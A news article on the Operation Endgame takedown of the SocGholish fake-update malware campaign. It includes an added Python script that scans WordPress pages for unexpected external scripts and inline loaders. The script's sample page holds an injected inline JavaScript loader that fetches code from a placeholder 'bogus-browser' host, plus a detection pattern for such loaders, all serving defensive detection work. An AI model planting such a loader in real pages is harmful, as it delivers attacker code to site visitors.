The Operation and Its Targets
A coordinated international law enforcement effort known as Operation Endgame has dealt a significant blow to the long-running SocGholish malware campaign. This action, involving Dutch police, the Royal Canadian Mounted Police, the FBI, German authorities, Europol, and Eurojust, resulted in the takedown of 106 servers and domains. Crucially, investigators cleaned 14,971 infected WordPress websites that were being used to funnel visitors toward malware.
SocGholish, active since at least 2017, is a malware framework that compromises legitimate WordPress sites and uses them to display convincing fake browser update prompts. When a visitor accepts one of these prompts, the "update" installs a backdoor, giving the attackers initial access that is often sold on or used to deploy ransomware. The SocGholish operators have been linked to the Russian cybercriminal group Evil Corp.
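A site owner who wants to check whether their own pages carry an injection of this kind can start by listing every script the page loads and comparing the sources against what the site is supposed to use. The following is an added example written for this page; it is not code from Malwarebytes, the investigators, or the SocGholish toolkit. It assumes the injection arrives as a script tag (either an external `src` pointing to an attacker-controlled host, or an inline loader that creates a second script element), which is a common delivery pattern but not something the article states. The sample HTML and all host names in it are constructed placeholders.

```python
"""Flag script tags in a WordPress page that load from hosts outside an allowlist.

Added example, not code from the article's source. SAMPLE_PAGE and every
host name below are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collect every <script> element on a page: its src (if any) and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []  # list of {"src": str | None, "body": str}
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})
            self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> contents to handle_data as raw text.
        if self._in_script and self.scripts:
            self.scripts[-1]["body"] += data


# Inline code that builds a second <script> element at runtime is how many
# loaders fetch their real payload. Heuristic only: tag managers and some
# analytics snippets do the same, so a hit is a lead to review, not a verdict.
DYNAMIC_LOADER_MARKERS = ("createElement('script')", 'createElement("script")')


def _host_of(src):
    """Host name of a script src; None for same-origin relative paths."""
    if src.startswith("//"):          # protocol-relative URL
        src = "https:" + src
    return urlparse(src).hostname


def find_suspicious_scripts(html, allowed_hosts):
    """Return (kind, host, detail) tuples for scripts that either load from a
    host outside allowed_hosts or are inline and inject another script.

    allowed_hosts: hosts the site legitimately loads scripts from (its CDN,
    its analytics provider, ...). Same-origin relative paths are always allowed.
    """
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for script in parser.scripts:
        src = script["src"]
        if src:
            host = _host_of(src)
            if host is not None and host not in allowed_hosts:
                findings.append(("external-script", host, src))
        elif any(marker in script["body"] for marker in DYNAMIC_LOADER_MARKERS):
            findings.append(("inline-loader", None, script["body"].strip()[:80]))
    return findings


# Constructed sample page: three legitimate scripts, one injected external
# script, and one inline loader of the kind a fake-update campaign might use.
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.example-theme.test/theme.js"></script>
<script async src="https://stats.example-analytics.test/tag.js"></script>
<script src="https://content.example-injected.test/loader.js"></script>
<script>var s=document.createElement('script');s.src='https://updates.bogus-browser.test/check.js';document.head.appendChild(s);</script>
</head><body><h1>Restaurant menu</h1></body></html>"""

ALLOWED_HOSTS = {"cdn.example-theme.test", "stats.example-analytics.test"}

if __name__ == "__main__":
    for kind, host, detail in find_suspicious_scripts(SAMPLE_PAGE, ALLOWED_HOSTS):
        print(f"{kind:16} {host or '-':32} {detail}")
```

In practice you would fetch the rendered page (the injection is often inserted by PHP in a theme or plugin file, so it appears in served HTML rather than in any one static file) and build the allowlist from a known-good copy of the site. Any unexpected host or dynamic loader is then a reason to diff the theme and plugin files against clean copies, rotate credentials, and follow the update and multi-factor advice the investigators gave site owners.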
Impact and Scope
Authorities discovered exposed login credentials for roughly 1.4 million WordPress sites during the investigation. They used legal hacking powers to remove backdoors and malware from the compromised websites, then notified site owners to update their software, change passwords, and enable multi-factor authentication. The affected sites included everyday businesses such as restaurants and car garages, meaning local visitors with no connection to the criminals were being exposed to the malware.
Operation Endgame is being described as the largest international operation against ransomware and cybercrime to date. This specific takedown breaks a key infection chain used by multiple ransomware groups, disrupting the link between thousands of ordinary websites and a sophisticated malware ecosystem. By reducing the pool of potential victims, law enforcement has increased the operational costs for the criminal group behind SocGholish.
Source: Malwarebytes
